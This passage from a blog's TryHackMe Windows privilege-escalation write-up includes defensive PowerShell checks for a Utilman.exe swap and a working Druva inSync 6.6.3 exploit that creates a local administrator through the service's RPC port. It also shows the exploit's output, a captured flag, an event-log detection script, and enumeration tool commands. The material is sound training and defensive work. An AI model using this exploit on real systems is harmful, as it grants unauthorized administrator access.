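        if ($line -match '^(Se\w+Privilege)\s*=\s*(.+)$' -and $dangerousRights -contains $Matches[1]) {
            $holders[$Matches[1]] = @($Matches[2] -split ',' | ForEach-Object { ConvertTo-AccountName $_.Trim() })
        }
    }
    Remove-Item -LiteralPath $cfg -ErrorAction SilentlyContinue
    return $holders
}

# takeown changes the owner, icacls adds a full-control ACE, and "copy cmd.exe Utilman.exe"
# leaves cmd.exe's hash and version resource behind; each is checked independently.
function Test-UtilmanIntegrity {
    $utilman = Join-Path $env:windir 'System32\Utilman.exe'
    $acl = Get-Acl -LiteralPath $utilman
    $ownerSid = $acl.GetOwner([System.Security.Principal.SecurityIdentifier]).Value
    $unexpectedWriters = @($acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $trustedSids -notcontains (ConvertTo-SidString $_.IdentityReference) -and
        $_.FileSystemRights.ToString() -match '\b(FullControl|Modify|Write|TakeOwnership|ChangePermissions)\b'
    } | ForEach-Object { $_.IdentityReference.Value })
    $originalName = (Get-Item -LiteralPath $utilman).VersionInfo.OriginalFilename
    $cmdHash = (Get-FileHash -LiteralPath (Join-Path $env:windir 'System32\cmd.exe')).Hash
    $utilHash = (Get-FileHash -LiteralPath $utilman).Hash
    [pscustomobject]@{
        Owner                   = $acl.Owner
        OwnerIsTrustedInstaller = ($ownerSid -eq $trustedInstallerSid)
        UnexpectedWriters       = $unexpectedWriters
        OriginalFilename        = $originalName
        IsCopyOfCmd             = ($cmdHash -eq $utilHash)
        Tampered                = ($ownerSid -ne $trustedInstallerSid) -or ($unexpectedWriters.Count -gt 0) -or
                                  ($originalName -ne 'utilman.exe') -or ($cmdHash -eq $utilHash)
    }
}

$rights = Get-DangerousRightHolders
foreach ($right in $dangerousRights) {
    '{0}: {1}' -f $right, $(if ($rights[$right]) { $rights[$right] -join ', ' } else { '(nobody)' })
}
Test-UtilmanIntegrity | Format-List
```

An Authenticode check alone would not catch the swap, because cmd.exe is itself a Microsoft-signed binary; the owner, ACL and version-resource checks are what expose it.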

Task 7 Abusing vulnerable software

Question: Get the flag on the Administrator's desktop.

Exploit code for Druva inSync 6.6.3 (exp.ps1):

$ErrorActionPreference = "Stop"

# Command the inSync service will run on our behalf.
$cmd = "net user pwnd SimplePass123 /add & net localgroup administrators pwnd /add"

# Connect to the local inSync RPC listener.
$s = New-Object System.Net.Sockets.Socket(
    [System.Net.Sockets.AddressFamily]::InterNetwork,
    [System.Net.Sockets.SocketType]::Stream,
    [System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)

# Message framing: protocol header, RPC type, little-endian length, then the UTF-16LE command line.
$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd")
$length = [System.BitConverter]::GetBytes($command.Length)

$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)

This exploit creates the user pwnd with the password SimplePass123 and adds it to the Administrators group.

After executing this in PowerShell, we can check the group membership of the newly added user:

PS C:\tools> .\Druva_inSync_exploit.ps1
22
4
4
280
PS C:\tools> net user pwnd
User name                    pwnd
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            9/23/2023 8:44:56 AM
Password expires             11/4/2023 8:44:56 AM
Password changeable          9/23/2023 8:44:56 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Administrators       *Users
Global Group memberships     *None
The command completed successfully.

Use the following command to open an elevated PowerShell as the new user:

PS C:\tools> Start-Process powershell -Verb runAs

PS C:\Windows\system32> whoami
wprivesc3\pwnd
PS C:\Windows\system32> type c:\users\administrator\desktop\flag.txt
THM{EZ_DLL_PROXY_4ME}
PS C:\Windows\system32>

Answer: THM{EZ_DLL_PROXY_4ME}
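
The exploit above leaves a clear trace: a local user created (event 4720) and added to Administrators (event 4732) by a SYSTEM-context process. As an added example (not part of the original write-up), this PowerShell script pulls those events from the Security log and shows who performed each action; it assumes an elevated session and that account-management auditing is enabled.

```powershell
# Added example (not the write-up's code): surface local account creation and
# Administrators membership changes, the observable result of the inSync exploit.
function Get-EventField([xml]$xml, [string]$name) {
    ($xml.Event.EventData.Data | Where-Object { $_.Name -eq $name }).'#text'
}

function Get-RecentLocalAdminAdditions([int]$Hours = 24) {
    $filter = @{ LogName = 'Security'; Id = 4720, 4732; StartTime = (Get-Date).AddHours(-$Hours) }
    foreach ($event in Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue) {
        [xml]$x = $event.ToXml()
        $subject = "$(Get-EventField $x 'SubjectDomainName')\$(Get-EventField $x 'SubjectUserName')"
        if ($event.Id -eq 4720) {
            [pscustomobject]@{
                Time   = $event.TimeCreated
                Event  = 'UserCreated'
                Target = Get-EventField $x 'TargetUserName'
                By     = $subject
            }
        } else {
            # 4732 names the group in TargetUserName and the new member only by SID.
            $memberSid = Get-EventField $x 'MemberSid'
            $member = $(try {
                (New-Object System.Security.Principal.SecurityIdentifier($memberSid)).Translate([System.Security.Principal.NTAccount]).Value
            } catch { $memberSid })
            [pscustomobject]@{
                Time   = $event.TimeCreated
                Event  = 'AddedTo ' + (Get-EventField $x 'TargetUserName')
                Target = $member
                By     = $subject
            }
        }
    }
}

# A SYSTEM-context subject (the computer account, HOSTNAME$) creating an administrator
# points at a service-level exploit like the inSync one rather than a help-desk action.
Get-RecentLocalAdminAdditions | Sort-Object Time | Format-Table -AutoSize
```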

Task 8 Tools of the Trade

WinPEAS

project link:
https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS

C:\tools> winpeas.exe > outputfile.txt

PrivescCheck

project link:
https://github.com/itm4n/PrivescCheck

cmd:
C:\tools> powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_%COMPUTERNAME%"

powershell:
PS C:\tools> Set-ExecutionPolicy Bypass -Scope process -Force
PS C:\tools> . .\PrivescCheck.ps1
PS C:\tools> Invoke-PrivescCheck -Extended -Report "PrivescCheck_$($env:COMPUTERNAME)"

Metasploit

If you already have a Meterpreter shell on the target system, you can use the multi/recon/local_exploit_suggester module to list vulnerabilities that may affect the target and allow you to elevate your privileges on it.

Author: z0sen
Copyright notice: Unless otherwise stated, all articles on this site are licensed under CC BY-NC-SA 4.0. Please credit z0sen's Blog when reposting.
TryHackMe RedTeam